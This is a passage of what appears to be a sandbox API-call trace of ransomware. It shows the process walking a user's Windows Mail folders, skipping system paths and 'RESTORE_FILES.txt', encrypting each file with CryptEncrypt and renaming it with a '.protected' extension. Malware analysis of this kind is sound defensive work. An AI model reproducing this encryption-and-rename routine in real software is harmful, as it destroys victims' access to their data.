lstrcmpiW (lpString1="oeold.xml", lpString2="System Volume 
Information") returned -1 [0085.438] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 80 [0085.438] StrStrIW (lpFirst="oeold.xml", lpSrch=".protected") returned 0x0 [0085.438] lstrcmpW (lpString1="oeold.xml", lpString2="RESTORE_FILES.txt") returned -1 [0085.438] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.438] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 80 [0085.439] StrStrW (lpFirst="oeold.xml", lpSrch=".txt") returned 0x0 [0085.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 80 [0085.439] StrStrW (lpFirst="oeold.xml", lpSrch=".rar") returned 0x0 [0085.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 80 [0085.439] StrStrW (lpFirst="oeold.xml", lpSrch=".zip") returned 0x0 [0085.439] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x104, lpOverlapped=0x0) returned 1 [0085.440] SetFilePointerEx (in: hFile=0x14c, 
liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.440] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x104, lpOverlapped=0x0) returned 1 [0085.440] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.440] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.441] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.441] CloseHandle (hObject=0x14c) returned 1 [0085.441] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.protected") returned 90 [0085.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml.protected")) returned 1 [0085.442] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.442] lstrcmpiW (lpString1="Stationery", lpString2="Windows") returned -1 [0085.442] lstrcmpiW (lpString1="Stationery", lpString2="Program Files") returned 1 [0085.442] 
lstrcmpiW (lpString1="Stationery", lpString2="Program Files (x86)") returned 1 [0085.442] lstrcmpiW (lpString1="Stationery", lpString2="$Recycle.bin") returned 1 [0085.442] lstrcmpiW (lpString1="Stationery", lpString2="System Volume Information") returned -1 [0085.442] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") returned 81 [0085.442] lstrcmpW (lpString1="Stationery", lpString2=".") returned 1 [0085.442] lstrcmpW (lpString1="Stationery", lpString2="..") returned 1 [0085.442] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*") returned 83 [0085.442] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.454] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.454] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.454] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.454] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.454] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.454] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\.") returned 83 [0085.454] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.454] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0085.454] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0085.454] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.454] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.455] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.455] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.455] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.455] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.455] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.455] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.455] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\..") returned 84 [0085.455] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.455] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.455] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0085.455] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0085.455] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.455] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.455] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.455] lstrcmpiW (lpString1="Bears.htm", lpString2="Windows") returned -1 [0085.455] lstrcmpiW (lpString1="Bears.htm", lpString2="Program Files") returned -1 [0085.455] lstrcmpiW (lpString1="Bears.htm", lpString2="Program Files (x86)") returned -1 [0085.455] lstrcmpiW (lpString1="Bears.htm", lpString2="$Recycle.bin") returned 1 [0085.455] lstrcmpiW (lpString1="Bears.htm", lpString2="System Volume Information") returned -1 [0085.455] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 91 [0085.455] StrStrIW (lpFirst="Bears.htm", lpSrch=".protected") returned 0x0 [0085.455] lstrcmpW (lpString1="Bears.htm", lpString2="RESTORE_FILES.txt") returned -1 [0085.455] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.455] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 91 [0085.456] StrStrW (lpFirst="Bears.htm", lpSrch=".txt") returned 0x0 [0085.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 91 [0085.456] StrStrW (lpFirst="Bears.htm", lpSrch=".rar") returned 0x0 [0085.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 91 [0085.456] StrStrW (lpFirst="Bears.htm", lpSrch=".zip") returned 0x0 [0085.456] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xff, lpOverlapped=0x0) returned 1 [0085.458] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.458] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xff, lpOverlapped=0x0) returned 1 [0085.458] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.458] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.458] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.458] CloseHandle (hObject=0x150) returned 1 [0085.459] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.protected") returned 101 [0085.459] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm.protected")) returned 1 [0085.460] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.460] lstrcmpiW (lpString1="Bears.jpg", lpString2="Windows") returned -1 [0085.460] lstrcmpiW (lpString1="Bears.jpg", lpString2="Program Files") returned -1 [0085.460] lstrcmpiW (lpString1="Bears.jpg", lpString2="Program Files (x86)") returned -1 [0085.460] lstrcmpiW (lpString1="Bears.jpg", lpString2="$Recycle.bin") returned 1 [0085.460] lstrcmpiW (lpString1="Bears.jpg", lpString2="System Volume Information") returned -1 [0085.460] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 91 [0085.460] StrStrIW (lpFirst="Bears.jpg", lpSrch=".protected") returned 0x0 [0085.460] lstrcmpW (lpString1="Bears.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0085.460] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.460] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 91 [0085.462] StrStrW (lpFirst="Bears.jpg", lpSrch=".txt") returned 0x0 [0085.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 91 [0085.462] StrStrW (lpFirst="Bears.jpg", lpSrch=".rar") returned 0x0 [0085.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 91 [0085.462] StrStrW (lpFirst="Bears.jpg", lpSrch=".zip") returned 0x0 [0085.462] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x432, lpOverlapped=0x0) returned 1 [0085.480] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffbce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.480] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x432, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x432, lpOverlapped=0x0) returned 1 [0085.480] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.481] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) 
returned 1 [0085.481] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.481] CloseHandle (hObject=0x150) returned 1 [0085.481] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.protected") returned 101 [0085.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg.protected")) returned 1 [0085.482] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.482] lstrcmpiW (lpString1="Desktop.ini", lpString2="Windows") returned -1 [0085.482] lstrcmpiW (lpString1="Desktop.ini", lpString2="Program Files") returned -1 [0085.482] lstrcmpiW (lpString1="Desktop.ini", lpString2="Program Files (x86)") returned -1 [0085.483] lstrcmpiW (lpString1="Desktop.ini", lpString2="$Recycle.bin") returned 1 [0085.483] lstrcmpiW (lpString1="Desktop.ini", lpString2="System Volume Information") returned -1 [0085.483] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 93 [0085.483] StrStrIW (lpFirst="Desktop.ini", lpSrch=".protected") returned 0x0 [0085.483] lstrcmpW (lpString1="Desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0085.483] CryptGenRandom 
(in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.483] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.483] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 93 [0085.483] StrStrW (lpFirst="Desktop.ini", lpSrch=".txt") returned 0x0 [0085.483] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 93 [0085.483] StrStrW (lpFirst="Desktop.ini", lpSrch=".rar") returned 0x0 [0085.483] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 93 [0085.483] StrStrW (lpFirst="Desktop.ini", lpSrch=".zip") returned 0x0 [0085.484] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x285, lpOverlapped=0x0) returned 1 [0085.484] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.484] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x285, lpOverlapped=0x0) returned 
1 [0085.485] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.485] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.485] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.485] CloseHandle (hObject=0x150) returned 1 [0085.486] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.protected") returned 103 [0085.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini.protected")) returned 1 [0085.487] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.487] lstrcmpiW (lpString1="Garden.htm", lpString2="Windows") returned -1 [0085.487] lstrcmpiW (lpString1="Garden.htm", lpString2="Program Files") returned -1 [0085.487] lstrcmpiW (lpString1="Garden.htm", lpString2="Program Files (x86)") returned -1 [0085.488] lstrcmpiW (lpString1="Garden.htm", lpString2="$Recycle.bin") returned 1 [0085.488] lstrcmpiW (lpString1="Garden.htm", lpString2="System Volume Information") returned -1 [0085.488] wnsprintfW (in: 
pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 92 [0085.488] StrStrIW (lpFirst="Garden.htm", lpSrch=".protected") returned 0x0 [0085.488] lstrcmpW (lpString1="Garden.htm", lpString2="RESTORE_FILES.txt") returned -1 [0085.488] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.488] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 92 [0085.488] StrStrW (lpFirst="Garden.htm", lpSrch=".txt") returned 0x0 [0085.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 92 [0085.488] StrStrW (lpFirst="Garden.htm", lpSrch=".rar") returned 0x0 [0085.489] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 92 [0085.489] StrStrW (lpFirst="Garden.htm", lpSrch=".zip") returned 0x0 [0085.489] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xe7, lpOverlapped=0x0) returned 1 [0085.490] SetFilePointerEx (in: 
hFile=0x150, liDistanceToMove=0xffffff19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.490] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xe7, lpOverlapped=0x0) returned 1 [0085.491] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.491] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.491] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 